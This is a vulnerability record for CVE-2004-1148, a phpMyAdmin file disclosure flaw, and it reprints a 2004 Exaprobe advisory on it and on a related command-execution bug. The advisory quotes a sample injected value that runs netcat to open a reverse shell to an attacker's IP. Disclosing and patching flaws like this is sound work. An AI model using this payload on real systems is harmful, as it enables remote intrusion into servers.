CVE-2004-1148
CVSS 5.0
Published: 2005-01-10 00:00:00
Last revised: 2016-10-17 22:51:45

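[Original text] phpMyAdmin before 2.6.1, when configured with UploadDir functionality, allows remote attackers to read arbitrary files via the sql_localfile parameter.


[CNNVD] phpMyAdmin UploadDir information disclosure vulnerability (CNNVD-200501-079)

        phpMyAdmin is a free tool that provides a web-based administration interface for MySQL.
        An information disclosure vulnerability exists in phpMyAdmin versions before 2.6.1.
        When the UploadDir functionality is enabled, a remote attacker can use the sql_localfile parameter to read arbitrary files.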

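- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)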

cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl3
cpe:/a:phpmyadmin:phpmyadmin:2.5.0
cpe:/a:phpmyadmin:phpmyadmin:2.4.0
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl2
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1148
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1148
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-079
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110295781828323&w=2
(UNKNOWN)  BUGTRAQ  20041213 Multiple vulnerabilities in phpMyAdmin
http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
(UNKNOWN)  MISC  http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
http://xforce.iss.net/xforce/xfdb/18441
(UNKNOWN)  XF  phpmyadmin-command-execute(18441)

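- Vulnerability information

phpMyAdmin UploadDir information disclosure vulnerability
Medium risk  Input validation
2005-01-10 00:00:00 2005-10-20 00:00:00
Remote
        phpMyAdmin is a free tool that provides a web-based administration interface for MySQL.
        An information disclosure vulnerability exists in phpMyAdmin versions before 2.6.1.
        When the UploadDir functionality is enabled, a remote attacker can use the sql_localfile parameter to read arbitrary files.

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue. Patch download link:
        http://www.phpmyadmin.net/home_page/downloads.php

- Vulnerability information (F35314)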

phpMyAdmin261rc1.txt (PacketStormID:F35314)
2004-12-30 00:00:00
Nicolas Gregoire  exaprobe.com
advisory,vulnerability
CVE-2004-1147,CVE-2004-1148

phpMyAdmin versions prior to 2.6.1-rc1 suffer from command execution and file disclosure vulnerabilities.

Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker needs access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Deactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

-- 
Nicolas Gregoire ----- Consultant en S    

- Vulnerability information

12331
phpMyAdmin UploadDir Function sql_localfile Parameter Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Unknown

- Vulnerability description

phpMyAdmin contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered on systems where $cfg['UploadDir'] is defined and PHP safe mode is disabled. 'sql_localfile' is not properly sanitized and can be exploited by a remote malicious user by calling read_dump.php via a crafted form from the phpMyAdmin interface, which will disclose file information resulting in a loss of confidentiality.

- Timeline

2004-12-13 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.6.1-rc1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Setting PHP safe mode to ON. If not feasible, deactivate the UploadDir mechanism.
